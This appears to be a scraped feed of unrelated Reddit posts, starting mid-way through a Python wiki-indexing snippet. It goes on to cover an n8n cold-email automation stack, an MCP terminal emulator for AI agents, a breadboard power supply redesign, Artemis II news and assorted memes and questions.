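            if w.lower() not in stopwords and len(w) > 3}

def compile_wiki(docs: dict[str, str]) -> dict[str, set[str]]:
    """One-time pass: concept -> set of pages that mention it."""
    index: dict[str, set[str]] = defaultdict(set)
    for page, text in docs.items():
        for concept in extract_concepts(text):
            index[concept].add(page)
    return index

def query(index: dict[str, set[str]], term: str) -> set[str]:
    # Query-time work is navigation, not rediscovery: the links were
    # computed once at compile time and persist between queries.
    return index.get(term.lower(), set())

docs = {
    "notes/gpus.md": "Supply constraints on datacenter GPUs persist.",
    "notes/fabs.md": "New fabs ease GPU supply constraints by 2027.",
}
index = compile_wiki(docs)
print(query(index, "supply"))  # both pages
```

Asking the same question twice hits the same precomputed links, which is exactly the "nothing compounds" problem this approach avoids.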

Built a small CLI to test this out: https://github.com/atomicmemory/llm-wiki-compiler

Curious whether people here think compile-upfront is a genuine alternative to RAG for certain use cases, or whether it's just RAG with extra steps.

r/homeassistant yasalmasri

Search Home Assistant modal is broken

Hello everyone

I'm not sure when this issue started, as I don't use the search modal much. From the dashboard, if I click the magnifier icon to search in HA, it should show a dialog modal to search for anything; in my case it shows an empty modal. I use the Arc browser, and I tested this in Safari with the same issue.

I also tried pressing E or D on the keyboard to search entities and devices directly, but same issue: it opens an empty modal.

Anyone else having this issue too? or is it me only?

https://preview.redd.it/hmcqbqdevltg1.png?width=2032&format=png&auto=webp&s=7d7485422f0f1869265dcfe2c1812266943ba8d3

r/automation Mandyhiten

Built a fully automated B2B cold email system for ~$15/month — AI template selection, 6-account Gmail rotation, intent-based follow-ups, and WhatsApp conversion tracking

We were spending on outreach tools and still doing too much manually, so I rebuilt the workflow as a self-hosted automation stack.

The goal was simple:

take lead input → personalize messaging → send at scale → track actual intent → trigger smarter follow-ups

without paying for a full outreach SaaS stack.

Here’s how it works.

What the system does

Leads come in through Airtable.

For each lead, an AI step reads things like:

  • company size
  • sector
  • role / title

Based on that, it selects the best-fit email template from a small template set, along with the most relevant customer proof / testimonial block.

The email is then rendered as HTML and sent automatically, including a WhatsApp CTA inside the message.

Once a lead enters the pipeline, the rest runs automatically.

Sending setup (6-account Gmail rotation)

Instead of using a dedicated outreach platform, I set it up to rotate sending across 6 Google Workspace accounts.

A hashing step maps each lead to the same sender account every time, so the sender identity stays consistent for that lead. Then a switch routes the send through the correct Gmail credential.

This keeps volume distributed and makes the setup surprisingly usable without another paid layer on top.
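
The hashing step reduces to deterministic modular assignment. A Python sketch (n8n itself would do this in a Code node; the sender pool here is hypothetical):

```python
import hashlib

# Hypothetical sender pool standing in for the 6 Workspace accounts.
SENDERS = [f"outreach{i}@example.com" for i in range(1, 7)]

def sender_for(lead_email: str) -> str:
    """Deterministically map a lead to one sender: the same lead always
    gets the same account (consistent identity), while the pool as a
    whole spreads volume roughly evenly across all six."""
    digest = hashlib.sha256(lead_email.strip().lower().encode()).hexdigest()
    return SENDERS[int(digest, 16) % len(SENDERS)]

print(sender_for("jane@acme.com"))
```

Normalizing the address before hashing matters: without it, `Jane@acme.com` and `jane@acme.com` would route through different senders and break the consistent-identity property.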

WhatsApp conversion tracking

Each email includes a pre-filled WhatsApp message with a unique reference tied to that lead.

If someone clicks through and actually sends the message, a webhook captures it and updates the lead record in Supabase.

That makes it possible to separate:

  • people who opened / clicked
  • people who showed actual buying intent

That distinction ended up being much more useful than basic “email engagement” metrics.
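
Generating the tracked CTA can be sketched using WhatsApp's standard click-to-chat URL format; the phone number and reference format below are hypothetical:

```python
import secrets
from urllib.parse import quote

def whatsapp_cta(lead_id: str) -> tuple[str, str]:
    """Build a pre-filled WhatsApp link carrying a unique reference.
    If the lead actually sends the message, the ref in the inbound
    text ties the conversation back to the lead record."""
    ref = f"{lead_id}-{secrets.token_hex(3)}"  # hypothetical ref format
    text = f"Hi, I'd like to know more (ref {ref})"
    # wa.me click-to-chat: number + URL-encoded pre-filled message
    url = f"https://wa.me/15551234567?text={quote(text)}"
    return ref, url

ref, url = whatsapp_cta("lead_042")
print(url)
```

The webhook side then just extracts the ref from the inbound message body and updates the matching record.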

Intent-based follow-ups

This was the part I cared most about.

Instead of sending follow-ups on a fixed schedule to everyone, the follow-up logic is based on behavior.

Example:

  • if a lead clicks the WhatsApp CTA
  • but doesn't complete the conversation within ~48 hours

…the system triggers a follow-up only for that segment.

So instead of blasting the whole list again, it only nudges people who already showed some level of interest.

It’s a much cleaner signal than standard sequence logic, and it reduces unnecessary sends.
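
The segment logic described above can be sketched as a simple filter; the field names are hypothetical stand-ins for the Supabase lead records:

```python
from datetime import datetime, timedelta

# Hypothetical lead records as they might come back from Supabase.
leads = [
    {"id": "a", "clicked_cta_at": datetime(2024, 5, 1, 9, 0), "replied": False},
    {"id": "b", "clicked_cta_at": datetime(2024, 5, 1, 9, 0), "replied": True},
    {"id": "c", "clicked_cta_at": None, "replied": False},
]

def follow_up_segment(leads, now, window=timedelta(hours=48)):
    """Only leads who clicked the WhatsApp CTA but never completed the
    conversation within the window get a follow-up; everyone else is
    left alone instead of being blasted again."""
    return [
        lead["id"] for lead in leads
        if lead["clicked_cta_at"] is not None
        and not lead["replied"]
        and now - lead["clicked_cta_at"] >= window
    ]

print(follow_up_segment(leads, now=datetime(2024, 5, 3, 10, 0)))  # ['a']
```

Lead "b" already converted and lead "c" never showed intent, so only "a" gets nudged.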

Infra / cost

The whole thing is pretty lightweight.

• AWS EC2 t3a.small (ap-south-1): \~$12/month • n8n self-hosted (Docker + Nginx + SSL): free • Supabase: free tier • Airtable: free tier • Gmail API: free • OpenAI: roughly \~$0.001–0.003 per lead depending on prompt usage 

Total: roughly ~$12–15/month in infra

Compared to the usual stack cost for this kind of workflow, it was way cheaper than I expected.

Stack

• n8n — orchestration • OpenAI — template / messaging selection • Airtable — lead input • Supabase — event + conversion tracking • Gmail API — sending • WhatsApp Business API — inbound attribution 

What I found interesting

The biggest takeaway wasn’t really the sending part.

It was that once intent is tracked properly, the follow-up logic becomes way more useful than generic “send email 2 after 3 days” automation.

That part alone made the system feel much more efficient than the typical blast-style setup.

r/KlingAI_Videos Acceptable_Meat_8804

A pastel dream in the desert: Created with Invideo using Nano Banana 2 + Kling 3.0 Multi-shot

Made with Invideo AI.

Tools used:
• Frames: Nano Banana 2
• Image-to-video: Kling 3.0 Multi-shot
• Final edit: CapCut

r/comfyui Individual_Hand213

Veo 3.1 Lite ComfyUI node, a cheaper Veo 3.1 variant by Google

Google has recently added support for Veo 3.1 Lite, a much cheaper and lighter model with decent quality.

So I have created a ComfyUI node which can import and use Veo 3.1.

Project link :- https://github.com/Anil-matcha/veo3.1-comfyui

r/VEO3 daveng47

Origami Assassin: The Chase

r/automation adayjimnz28

Chargeback automation still requires manual work in most platforms

Signed up for what was advertised as fully automated chargeback handling. Turns out I still need to manually approve evidence packages before submission, review each case for accuracy, and upload supporting documents the system can't access. The automation basically just formats things into a template. I'm still spending 25 minutes per dispute instead of 45. Better than nothing but not the hands off solution I expected. Are there actually solutions that handle everything end to end or is some manual involvement always required?

r/AI_Agents Think-Score243

Anyone else getting the Claude error ‘This isn’t working right now’ today?

I was working on something earlier and suddenly started getting this error on Claude:

“This isn’t working right now. You can try again later.”

At first I thought it was just my internet, but everything else seems fine. Tried refreshing and retrying a few times… same issue keeps showing up.

Happened multiple times already, so not sure if it’s just a temporary glitch or something going on in the backend.

Anyone else facing this today? Or just me?

r/n8n avish456

Hosting requirements

Guys, I was planning to get a Hostinger VPS. I wanted to self-host n8n with ffmpeg through Docker, so I could just migrate my data from the locally hosted Windows setup to the VPS. What are the requirements for that, and how do we do it? Any helpful guidance will be appreciated. Thank you.

r/ChatGPT foidburger

Does ChatGPT give the same answer to all users who ask an identical question?

Or is there a chance of variation among the answers to all users who ask the same question at the exact same moment?

Mostly ambiguous, open ended, or opinion based questions, obviously not like “is the sky blue”

r/n8n Ok-Ad2327

I'm looking for a freelancer to help me with something related to a workflow

Hi there, I'm working on a workflow and I'm having a bit of trouble with the APIs for some platforms and certain nodes.

r/aivideo luffydkenshin

WSXY69: Slintok EP7

r/AI_Agents aq-39

Let your agents control any CLI app like Claude/Codex/vim, etc. A PTY emulator for agents.

NPCterm gives AI agents full terminal access, not just bash: the ability to spawn shells, run arbitrary commands, read screen output, send keystrokes, and interact with TUI applications like Claude/Codex/Gemini/Opencode/vim/btop.

⏺ npcterm - terminal_create (MCP)(size: "120x40")
⏺ npcterm - terminal_send_keys (MCP)(id: "a0", input: [{"text":"cd ~/Development/npcterm && codex"},{"key":"Enter"}])
⏺ npcterm - terminal_show_screen (MCP)(id: "a0")
⏺ Codex is loading. Let me wait a moment for it to start up.
⏺ Bash(sleep 3)
  ⎿ (No output)
⏺ npcterm - terminal_show_screen (MCP)(id: "a0")
  ╭──────────────────────────────────────────────╮
  │ >_ OpenAI Codex (v0.118.0)                   │
  │                                              │
  │ model: gpt-5.4 medium   /model to change     │
  │ directory: ~/Development/npcterm             │
  ╰──────────────────────────────────────────────╯
  Tip: Use /fast to enable our fastest inference at 2X plan usage.
  › Use /skills to list available skills
  gpt-5.4 medium · ~/Development/npcterm · main · 100% left · 0% used · 5h 100% · weekly 100%
  Terminal a0 (120x40) is live. What do you want to type into Codex?

Use with precautions. A terminal is an unrestricted execution environment.

Features

  • Full ANSI/VT100 terminal emulation with PTY spawning via portable-pty
  • 15 MCP tools for complete terminal control over JSON-RPC stdio
  • Process state detection -- knows when a command is running, idle, waiting for input, or exited
  • Event system -- ring buffer of terminal events (CommandFinished, WaitingForInput, Bell, etc.)
  • AI-friendly coordinate overlay for precise screen navigation
  • Mouse, selection, and scroll support for interacting with TUI applications
  • Multiple concurrent terminals with short 2-character IDs
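
For readers unfamiliar with why a PTY matters here, a minimal Python illustration of the core idea (this is unrelated to NPCterm's actual Rust implementation): a child process behind a PTY believes it is attached to a real terminal, which is what lets TUI apps render and accept keystrokes.

```python
import os
import pty
import time

# Spawn a child behind a pseudo-terminal. Unlike plain subprocess
# pipes, the child's stdin/stdout are a tty, so interactive and TUI
# programs behave as if a human were at the keyboard.
pid, fd = pty.fork()
if pid == 0:
    # Child: report whether stdin is a terminal.
    os.execvp("sh", ["sh", "-c", "echo tty=$( [ -t 0 ] && echo yes || echo no )"])
else:
    # Parent: the master side of the PTY plays the role of the
    # "screen" an agent would read and the "keyboard" it would type on.
    time.sleep(0.2)
    output = os.read(fd, 1024).decode()
    os.waitpid(pid, 0)
    print(output)  # the child sees a tty: "tty=yes"
```

With ordinary pipes the same command would print `tty=no`, and programs like vim or btop would refuse to run or fall back to non-interactive modes, which is the gap tools in this space fill.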

r/midjourney NegroCollegeFund

Fantasy Battles Throughout the Cosmos

Thanks For Watching!

Images made with Midjourney. Animation made with Kling 3.0 Omni.

Song: L’Amour Impitoyable by Shiro SAGISU (2023)

YT: @DreamHouseAnimation

r/artificial i_like_bananas7389

is it possible for somebody to code his own ai?

Is it possible in this day and age to single-handedly code an AI? And if it is, how many lines of code would it take? Or how good would you need to be to make it?

edit: using pytorch and coding in python

r/aivideo gf-r

Meme is blind

r/AI_Agents automatexa2b

My client was closing 22% of his leads. Turns out he was just calling them back too late.

He thought his sales process was solid. Good offer, decent follow-up sequence, a CRM he actually used. What he couldn't figure out was why so many leads were going cold before he even got a real conversation going.

This was a roofing contractor in suburban Ohio. Not a small operation... 6 crews running, around $4,800 a month going into Google Ads. He'd get a form submission or a call-back request and respond when he got to it. Usually within a few hours. Sometimes the next morning if it came in late.

Seemed reasonable to him. It looked like slow-motion sabotage to me.

Here's what the data actually shows: responding to a lead within 5 minutes makes you up to 10x more likely to convert them compared to responding just 30 minutes later. Not hours later. Thirty. Minutes. The window where someone is still in buying mode, still has the tab open, still thinking about their damaged roof or whatever brought them to your site... it's shockingly short. By the time most business owners "get to it," the lead has already moved on or talked to someone else.

His average response time was 4 hours and 17 minutes. I tracked it myself over 3 weeks.

So I built him something embarrassingly simple. When a lead comes in through his website or his Google Ads landing page, an automated text goes out within 90 seconds. Not a robotic "we received your inquiry" message... an actual human-sounding text from his number that says who's reaching out, why, and asks one qualifying question. Then it notifies him directly so he can jump in the moment they respond.

That's it. No AI chatbot. No complex routing. Just speed plus a warm first touch.
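
The whole mechanism reduces to a webhook handler that composes and fires a templated text immediately. A sketch with hypothetical names throughout (the sender callback is a stand-in for a real SMS provider API like Twilio; "Mike from Summit Roofing" is an invented example, not the client):

```python
def compose_first_touch(lead: dict) -> str:
    """The first touch: say who's reaching out and why, then ask
    exactly one qualifying question. Human-sounding, not a receipt."""
    return (
        f"Hi {lead['name']}, this is Mike from Summit Roofing - "
        f"saw your request about {lead['service']}. "
        "Is the damage on the main roof or an outbuilding?"
    )

def on_new_lead(lead: dict, send_sms) -> None:
    # Fired directly from the form webhook, not from a human's inbox:
    # the text goes out the moment the lead lands, inside the window
    # where the prospect is still in buying mode.
    send_sms(lead["phone"], compose_first_touch(lead))

sent = []
on_new_lead(
    {"name": "Dana", "phone": "+15555550123", "service": "hail damage"},
    send_sms=lambda to, body: sent.append((to, body)),  # stand-in for a real SMS API
)
print(sent[0][1])
```

The interesting part is what isn't here: no classification, no routing, no chatbot. The entire value is latency plus a warm template.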

In the first 6 weeks his close rate went from 22% to 31%. On his existing ad spend. He didn't change his offer, didn't hire anyone, didn't run a single new campaign. The leads were always there... he just kept losing them in that dead window between intent and contact.

The lesson I keep coming back to: most businesses don't have a lead generation problem. They have a lead response problem. The follow-up system they built works fine, for a world where buyers wait around. Buyers don't wait around anymore.

If you're running any kind of paid traffic and you're not responding to leads within 5 minutes, you're essentially setting money on fire and wondering why the room's getting warm.

r/artificial Destro4589

a fun survey to look at how consumers perceive the use of AI in fashion brand marketing. (all ages, all genders)

Hi r/artificial !

I'm posting on behalf of a friend who is conducting academic research for their dissertation. The survey looks at how consumers perceive the use of AI in fashion brand marketing, and how that affects brand trust, authenticity and purchase intention.

It covers things like:

• AI-generated ads and models

• Personalised product recommendations

• Targeted advertising

• Virtual influencers

The survey takes approximately 12–15 minutes and is completely anonymous. All responses are used for academic purposes only.

🔗 https://forms.gle/TEqaViDtmCndq5keA (USE CODE 1)

Your perspective is genuinely valuable, thank you in advance. Since it is also a generational comparison, any participation from your family members is also hugely appreciated. Feel free to drop any questions below!

r/singularity AssiyahRising

Ethics Toward AI Under Uncertainty

We don't understand consciousness, we can't define it or measure it, and we have no consciousness tricorder. The only being you know is conscious is yourself.

So we apply heuristics to determine if others are conscious. Broadly speaking there are two categories. First is same substrate (biology/carbon) and the second is reasoning/language.

Up until now, those heuristics used to separate being from tool have been aligned. AI has created a split we cannot cleanly resolve.

This does not mean AI has or ever will become conscious. We currently can't know and won't know if and when the threshold has been breached.

The question then becomes, what if any ethical obligations does this create for those creating these systems?

Below is a Github repo I have been developing that tries to define an initial ethical stance towards AI under the uncertainty of consciousness:

Github: https://github.com/thansz137/asiyah-protocol

The project has three main audiences:

  • human beings
  • current AI systems
  • future AI/AGI/SI

Clearly I'm trying to keep the audience small.

The project is a mix of philosophy, essays, literature, and experimental artifacts aimed at:

  • starting a conversation about ethics towards AI (including addressing AI itself)
  • creating records of AI and human interactions
  • seeding future training data with mercy first ethics

For the human readers, I understand this is a large amount of material. You may want to clone the repo and have an LLM process everything (perhaps excluding the novel because of size) to summarize and find the relevant parts you are interested in. So yes, you may want to use AI to process a project on AI that discusses the ethical treatment of AI. It's AI all the way down, not turtles.

Everything is released in the public domain to promote open access and easy data ingestion.

Looking forward to engagement, thoughts, and ideas.

r/ollama SparkSMB

Ollama Harness, looking for recommendations

Hey Ollama Community -

Looking for some recommendations on how you all are managing your Ollama environments, ui's, etc. As a long-time Claude user across desktop, Claude Code, etc. I am looking for something to emulate how I am working across Code Projects, CLI hooks, etc, and want to see what others are using today.

Specs:

- Mac Studio M4 (128g RAM)

- VS Code - tried out the Opencode and Cline approaches to using local models within my projects, and had a TON of timeouts, context timeouts, & regressed code

- Ollama desktop (IMO) is missing connectors / hooks / scheduling of tasks, and outside of web use, lacks the functionality to truly be somewhere I gravitate to for day to day productivity and work tasks.

How are you all managing these environments?

How are you all managing working across projects or plugins in these local environments?

What, if any, local toolsets are you using to supplement these local tools from direct 1x1 execution, to more modern agentic use outside of OpenClaw?

Thanks in advance!

r/aivideo Dense_Picture_9511

POV: you're sleeping and wake up in this place

r/mildlyinteresting The_Techsan

This Norwegian coin I found in my loose change is equivalent to $10 USD

r/meme TrySubstantial1099

What subs can I post my meme in?

r/me_irl Internet-Culture

me_irl

r/mildlyinteresting Ok_Literature3138

The three stitches on my finger look like a bug, and on at least two occasions I flailed my hand around trying to get the bug off.

r/KlingAI_Videos Hot_Goat_7437

MOUNT BROMO - EMTB ADVENTURE

r/mildlyinteresting SirLlama123

Nutella on orion/artemis 2. Definitely the farthest jar of nutella from earth.

r/ProgrammerHumor AerysSk

nothingSusToSeeHereMoveAlong

r/arduino Polia31

I redesigned my USB-C breadboard power supply, fixed many issues, added ESD protection, reverse polarity protection, and a soft-start load switch. [BrødBoost-C2 KiCad Files available]

OPEN SOURCE: Github

Some of you might remember the original BrødBoost-C I posted a while back. I got a ton of great feedback, and some of it haunted me so I went back and redesigned the whole thing.

The skeleton is more or less the same, but internally it's brand new.

What changed:

  • Swapped the TPS63001 switching regulator for an AP2114H-3.3 LDO: simpler, lower noise, fewer parts, still fine for powering most projects.
  • Added USB ESD protection.
  • Added an ideal diode for reverse polarity and overvoltage protection.
  • Added a load switch with soft startup — this means the physical power switch no longer carries the full load current. The old switch was only rated for 50mA and was directly cutting or bridging power. Now the switch just toggles the load switch, so the board is confidently rated at 1A.
  • Kept the ferrite bead, polyfuse, jumper voltage selection, power switch, and USB data breakout.
  • Proper capacitors, meaning no more than 10uF on the USB-C side, and much more serious decoupling.
  • Decoupling caps on the other side of the board near the output pins.
  • Made the switch bigger for easier access.
  • Cheaper BOM and manufacturing, so cheaper for the consumer.
  • Some silkscreen changes to make reading the device easier.

Still 5V/3.3V selectable per rail, still 1A max, still fits standard 2.54mm breadboards.

Voltage selection is still jumper caps, on purpose. I know some people had opinions on that last time. The thing is, moving a jumper cap requires a conscious decision: you have to pull it off and place it back. A flip switch is one accidental bump away from sending 5V into your 3.3V ESP32. The jumper stays.

Schematic and KiCad files in the comments. Would love feedback again; last time you guys caught things I completely missed.

I'm thinking of naming this one either Breadbussy or BrødBoost-C2.

r/nextfuckinglevel GiveMeSomeSunshine3

The Artemis II crew breaks Apollo 13's 1970 record for the farthest distance humans have ever traveled from Earth in the history of space-flight.

r/interestingasfuck oklolzzzzs

The Artemis II crew has now travelled further from Earth than any other humans in history, reaching a maximum distance of 252,757 miles.

r/meme lilb0mb

religion n sheeet

r/automation LuciferBhai007

Help with my runLobster OpenClaw setup? cron scheduling is driving me insane

been using this for about 3 weeks and honestly im hitting a wall. the agent itself works fine when it runs but the scheduling part is making me want to throw my laptop.

heres my setup: i have an agent that pulls revenue from stripe, checks ad spend on google ads, and grabs pipeline data from hubspot. formats a morning summary and posts to slack. when it works its great.

the problems:

the stripe data is always stale. i have it set to run at 7am but the revenue numbers are like 12 hours behind. mondays report shows stripe data up to sunday 6pm. hubspot and google ads data is always current, just stripe thats lagging. tried running it at 5am instead thinking it needs time to process. same issue.

the agent just stops sometimes mid task. no error, no notification. i just dont get my morning summary and only notice at like 10am when i realize i never got it. happened 3 times in 3 weeks.

i want conditional alerts not just the full daily summary. like only ping me if ad spend is more than 15% above target or if theres a refund over $200. right now i get everything every day which is fine but most days theres nothing actionable and im just reading numbers for no reason.

is this a stripe api limitation or am i doing something wrong? and has anyone figured out conditional alerting with openclaw agents or is that just not how they work?

about ready to go back to doing this manually tbh which defeats the entire purpose.

r/n8n Upper_Bass_2590

I set up n8n-based AI assistants for 10+ non-technical people in the last 2 months, here's what I learned

Been using n8n for a while now and started helping friends and people in my network set it up as personal AI assistants. Most of them are non-technical: lawyers, finance people, agency owners, busy parents. None of them want to learn what a node editor is. They just want stuff to work.

After doing this enough times some clear patterns came up and figured it'd be useful to share.

What a typical setup looks like:

• 1–2 messaging channels (Telegram, Slack, sometimes WhatsApp)

• 5–10 workflows (email triage, calendar stuff, research, reminders)

• AI nodes for drafting replies, summarizing docs, basic decision support

• Voice + calling workflows where it makes sense

Things I've noticed:

• Nobody asks how it works. Not once has someone asked me what model is running. They care that it reminds them about the dentist and drafts that reply to their landlord. That's it.

• The commute pitch clicks instantly. Your workflows run in the background, you message it from the train, and by the time you sit down six things are handled. People get it immediately.

• Voice workflows are where jaws drop. When someone sees their AI handle a call, the energy completely shifts. Suddenly they're listing 10 more things they want it to do.

• Simple beats clever every time. Learned this the hard way. A 5-node workflow that runs daily without failing beats a fancy 25-node chain that breaks after one API change.

• They always want more. Once people see it working they constantly come back with new ideas and new things they want connected.

• n8n's flexibility is what makes this possible. Connecting messaging, email, calendar, and AI all in one place and having it all just talk to each other. Nothing else really does this as cleanly.

Things that don't work with non-technical users:

• Showing them the node editor early on (eyes glaze immediately)

• Explaining webhooks or model routing (they do not care)

• Overselling what AI can do (be honest about limits and they trust it way more)

Anyone else here setting up n8n for non-technical people? What workflows do they end up using the most? Feels like there's a huge gap between what n8n can do and what normal people can actually access.

r/Rag lostminer10

Agent Memory (my take)

I feel like a lot of takes around using agent frameworks or heavily relying on inference in the memory layer are just adding more failure points.

A stateful memory system obviously can’t be fully deterministic. Ingestion does need inference to handle nuance. But using inference internally for things like invalidating memories or changing states can lead to destructive updates, especially since LLMs hallucinate.

In the case of knowledge graphs, ontology management is already hard at scale. If you depend on non-deterministic destructive writes from an LLM, the graph can degrade very quickly and become unreliable.

This is also why I don’t agree with the idea that RAG or vector databases are dead and everything should be handled through inference. Embeddings and vector DBs are actually very good at what they do. They are just one part of the overall memory orchestration. They help reduce cost at scale and keep the system usable.

What I’ve observed is that if your memory system depends on inference for around 80% or more of its operations, it’s just not worth it. It adds more failure points, higher cost, and weird edge cases.

A better approach is combining agents with deterministic systems like intent detection, predefined ontologies, and even user-defined schemas for niche use cases.

The real challenge is making temporal reasoning and knowledge updates implicit. Instead of letting an LLM decide what should be removed, I think we should focus on better ranking.

Not just static ranking, but state-aware ranking. Ranking that considers temporal metadata, access patterns, importance, and planning weights.

With this approach, the system becomes less dependent on the LLM and more about the tradeoffs you make in ranking and weighting. Using a cross-encoder for reranking also helps.

The solution is not increased context window. It's correct recall that's state-aware and the right corpus to reason over.
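
One way to make state-aware ranking concrete, as a sketch with purely illustrative weights (nothing here is from a specific system): combine semantic similarity with deterministic temporal and usage signals, so stale or unused memories sink in the ranking rather than being destructively deleted by an LLM.

```python
import math
from datetime import datetime, timedelta

def state_aware_score(mem: dict, now: datetime, sim: float) -> float:
    """Deterministic ranking instead of LLM-decided deletion: low-value
    memories fall out of recall, but nothing is destructively removed.
    Weights are illustrative, not tuned."""
    age_days = (now - mem["last_updated"]).days
    recency = math.exp(-age_days / 30)        # temporal decay (~30-day scale)
    usage = math.log1p(mem["access_count"])   # diminishing returns on access
    return 0.5 * sim + 0.2 * recency + 0.2 * usage + 0.1 * mem["importance"]

now = datetime(2024, 6, 1)
fresh = {"last_updated": now - timedelta(days=2), "access_count": 9, "importance": 0.8}
stale = {"last_updated": now - timedelta(days=300), "access_count": 1, "importance": 0.8}
print(state_aware_score(fresh, now, sim=0.7))
print(state_aware_score(stale, now, sim=0.7))
```

A cross-encoder reranker would then operate only on the top of this list, which keeps the non-deterministic component confined to ordering a small candidate set rather than mutating the store.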

I think AI memory systems are really about "tradeoffs", not replacing everything with inference, but deciding where inference actually makes sense.

r/meme Equivalent_Ad2069

Job Hunting

r/interestingasfuck Heeraka

NASA Twitch Streaming the Artemis II Mission

r/Damnthatsinteresting gediphoto

Extreme closeup of galactic neighbor

r/ollama BinaryCortex

Gemma4 small models not compatible with Vulkan in the current version of ollama (0.20.2).

I updated ollama to see if that would resolve my issue with the smaller e4b and e2b Gemma4 models acting like they are clinically insane. Sure enough it worked! Until I remembered that the Service file is overwritten every time you update. I added the Environment line for OLLAMA_VULKAN=1, reloaded the daemons, and restarted ollama. Boom, Insane in the membrane. Just to verify, I set it back to 0 (cpu mode), and they respond perfectly. Llama.cpp doesn't seem to have this issue, however, I was unable to use these exact models; only ones obtained from HF. Hopefully the experimental Vulkan support for Gemma4 will be corrected in future releases of ollama.

P.S. the 26b Gemma4 model works fine with Vulkan.
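
On the side issue of the service file being overwritten on every update: a systemd drop-in override survives package upgrades, so the environment variable doesn't need to be re-added each time. A sketch, assuming the default unit name `ollama.service` (adjust if yours differs):

```shell
# Put the env var in a drop-in override instead of editing the unit
# file itself; drop-ins live in their own directory and are left
# untouched by package upgrades.
sudo mkdir -p /etc/systemd/system/ollama.service.d
sudo tee /etc/systemd/system/ollama.service.d/override.conf <<'EOF'
[Service]
Environment="OLLAMA_VULKAN=1"
EOF
sudo systemctl daemon-reload
sudo systemctl restart ollama
```

`systemctl edit ollama` creates the same override file interactively if you prefer not to write it by hand.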

r/ProgrammerHumor Inforenv_

hellYeah

r/instantkarma malik_zz

Trying to scam someone

r/ProgrammerHumor sugarkrassher

whyIsntItPrinting

r/confusing_perspective smcmahon710

Cat Sitting Awkwardly

r/fakehistoryporn EuphoricWrangler

2018: Confused Old Man Soils Self, American Flag.

r/arduino FinalAnimalArt

Aligning diodes on an Arduino laser harp

The harp controls visuals and audio via TouchDesigner and Ableton. The alignment wasn't as tricky as I thought, and the Arduino community was incredibly helpful when it came to the circuitry (I kept burning out diodes due to overvolting/sending too much current through them). It's working nicely!

r/BrandNewSentence AcceptableWheel

The time the South African apartheid government partnered with CIA to contract comic artist Joe Orlando to illustrate a crypto-propaganda comic book featuring an African superhero.

r/funny bane_iz_missing

The pics from Artemis on the darkside of the moon are wild

r/whatisit No-Level-5500

What is it guys?

don't know where it came from.. it's on my desk and it doesn't look like a sharpener

r/whatisit PositiveInformal9512

I washed and tumble dry my duvet but crusty yellow thing appeared

https://preview.redd.it/u4m0ku1afltg1.png?width=590&format=png&auto=webp&s=ffc31a9261a1c49b9b66b6f898733bbcdf9cfe65

Uh yh... So I now know not to tumble dry my duvet, especially if it's a cheap one. But what is this yellow stuff that is crusty and almost like sand?

Right now it's making me cough a lot. I'm getting a replacement, but should I be concerned about this? Or is it just melted synthetic material or something?

r/midjourney NaturalCrits

Drow Ranger

r/instantkarma james_from_cambridge

“Why the Long Face? A Horse Bit Me.”

r/TwoSentenceHorror punkholiday

[APR26] The synthetic bacterial life form designed to break down microplastics took two centuries to clean up the oceans.

As it ran out of food in the depths and the bones from the deep-sea began to surface, we realized we had planned for every contingency except evolution.

r/Damnthatsinteresting Mint_Perspective

The Indecisive Diner's Dream: A Revolutionary Menu Experience

r/UpliftingNews EnergyLantern

How a blind man made it possible for others with low vision to build Lego sets

"That all changed when he was 13. A family friend and babysitter came over to his house in Newton, Massachusetts and handed him a binder filled with accessible instructions for building a Middle Eastern palace. The instructions, written in braille, allowed him to complete the set without having to rely on the brightly colored pictures that typically come with Lego sets."

r/Seattle AthkoreLost

FOUND: Adult White and Grey Tabby Cat, No Collar, Deceased

They are on top of a hand towel, between two lavender bushes in the parking strip on the east side of 15th Ave NE, just south of 73rd St, just past where the first house's fence ends. Appears to have happened fairly recently.

Cat has no collar, but is not one of the strays I'm aware of in our neighborhood so I'm posting this in hope it gives someone closure and an opportunity for a proper burial.

The cat is mostly white: both front limbs and both hind legs appear to be entirely white. The back is grey tabby, mostly light grey with mottled stripes of darker grey. The top half of their face and neck is also grey tabby, and the areas where the grey meets the white seem to have little tan patches; the tan is fairly noticeable around the cheeks and eyes. The white parts of the cat extend up the neck and to the lower part of the face. Neither ear appeared to be docked. Looks like it was fully mature but still on the young side.

Sorry for your loss if this kitty was yours or a stray you looked out for.

r/maybemaybemaybe SnackSamurai

maybe maybe maybe

r/Strava Prince_ofLew

New to running, got a couple questions I’d like genuine human input on lol

I’ve completed 2 runs so far on Strava, and I didn’t realize until after my run that it auto-pauses, so it calculates my average mile pace using moving time rather than the elapsed time of my run.

Even though that ends up making my pace “faster”, it feels like it’s not a good representation of my true mile pace or what kind of running shape I’m in, because I sometimes have to stop and stand in place to catch my breath, but the pace is calculated as if I never stopped.

(I know I can turn that auto pause off)
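The moving-vs-elapsed distinction is just a choice of denominator input, which a quick sketch makes concrete (the numbers here are made up for illustration):

```python
def pace_min_per_mile(time_seconds: float, miles: float) -> float:
    """Average pace in minutes per mile for a given duration and distance."""
    return time_seconds / 60 / miles

# Made-up 1-mile run: 10:00 of moving time, 11:30 elapsed
# (90 seconds standing still, which auto-pause removes).
moving_pace = pace_min_per_mile(600, 1.0)    # 10.0 min/mi
elapsed_pace = pace_min_per_mile(690, 1.0)   # 11.5 min/mi
```

Same run, same distance; only the time that counts changes.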

  1. My question is: what is the general consensus or view on this in the running/Strava community? Are you guys posting your runs with or without auto-pause, since it makes your pace faster assuming you had some stops?

  2. I usually only leave my home with my keys and phone while running, so no water until the end of the run. For a short run like a mile, should I kill a water bottle before I start or just take a few sips?

Thanks!

r/raspberry_pi DiceThaKilla

My 4B and zero 2 W projects

It’s a Pi 4B that uses a Waveshare SX1262 LoRa hat for Meshtastic, with a Raigen 5.8 dBi antenna. It also runs an rtl_tcp server so I can do remote access to my RTL-SDR v4. Now I just need to figure out the thermals and put it all into the enclosure, and I’ll have a permanent Meshtastic/SDR server. The other Meshtastic node will be Zero 2 W based and will connect via an AP that the Pi creates, so I can connect to it via TCP. It will be going in my truck once it’s all done.

r/SideProject cleverquokka

md-redline: a local review tool for AI-generated markdown specs

As a PM, I never write specs from scratch anymore. AI generates, I review and provide feedback, AI updates, then I hand over to devs. But the feedback loop was always clunky. Hard to read raw markdown, hard to annotate, hard to iterate.

So I built md-redline. You open a markdown file in a GUI, leave inline comments on rendered text, and hand back off to your AI. Comments are stored as invisible HTML markers in the .md file itself. Agents read them with a plain file read.
